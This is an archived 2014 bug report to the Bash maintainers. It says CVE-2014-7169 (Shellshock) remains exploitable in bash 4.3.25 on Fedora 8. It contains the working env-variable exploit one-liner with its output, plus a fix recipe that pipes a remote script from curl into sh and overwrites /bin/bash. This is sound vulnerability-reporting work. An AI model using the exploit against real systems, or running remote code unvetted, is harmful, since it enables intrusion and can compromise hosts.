[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Exploit 2 (CVE-2014-7169)
|
From: |
Brady Cummings |
|
Subject: |
Exploit 2 (CVE-2014-7169) |
|
Date: |
Fri, 26 Sep 2014 11:27:27 -0500 (CDT) |
Bash Maintainers,
Bash Version : GNU bash, version 4.3.25(2)-release (i686-pc-linux-gnu)
OS Version : Fedora release 8
Processor : Intel Atom D425 1.8GHz Single-core
RAM : 1GB
Compilation Flags : Defaults (compiles fine)
Bug: Exploit 2 (CVE-2014-7169) still exists 4.3.25(2) version when complied in
Fedora Core 8.
Command : bash -version || sh --version
Results :
GNU bash, version 4.3.25(2)-release (i686-pc-linux-gnu)
Copyright (C) 2013 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<http://gnu.org/licenses/gpl.html>
This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Command : env X='() { (a)=>\' bash -c "echo date"; cat echo
Results :
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
Fri Sep 26 11:05:55 CDT 2014
Recipe : Based on script from https://shellshocker.net/
curl https://shellshocker.net/fixbash | sh
cp -f /usr/local/bin/bash /bin/bash
sh --version
env X='() { (a)=>\' bash -c "echo date"; cat echo
Thanks,
Brady Cummings
Sr. Software Engineer
CONTROL | CONNECT | IMPROVE
TCS Basys Controls 2800 Laura Lane
Middleton, WI 53562
TOLLFREE: 800.288.9383 PH: 608.836.9034 Ext. 9180 FX: 608.836.9044
www.tcsbasys.com
Please consider the environment before printing this e-mail
This message is for the named person's use only. You must not, directly or
indirectly, use, disclose, distribute, print, or copy any part of this message
if you are not the intended recipient. © 2013 Temperature Control Specialties
- Exploit 2 (CVE-2014-7169),
Brady Cummings <=